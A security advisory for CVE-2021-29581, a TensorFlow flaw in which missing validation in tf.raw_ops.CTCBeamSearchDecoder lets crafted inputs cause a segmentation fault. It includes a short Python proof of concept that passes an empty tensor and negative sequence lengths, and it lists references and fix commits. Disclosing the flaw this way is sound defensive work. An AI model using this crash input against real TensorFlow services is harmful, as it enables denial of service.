CVE-2021-29581: Segfault in `CTCBeamSearchDecoder`
(updated )
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults:
import tensorflow as tf
inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32)
sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100],
shape=[8], dtype=tf.int32)
beam_width = 10
top_paths = 3
merge_repeated = True
tf.raw_ops.CTCBeamSearchDecoder(
inputs=inputs, sequence_length=sequence_length, beam_width=beam_width,
top_paths=top_paths, merge_repeated=merge_repeated)
References
- github.com/advisories/GHSA-vq2r-5xvm-3hc3
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-509.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-707.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-218.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/b1b323042264740c398140da32e93fb9c2c9f33e
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vq2r-5xvm-3hc3
- nvd.nist.gov/vuln/detail/CVE-2021-29581
Detect and mitigate CVE-2021-29581 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →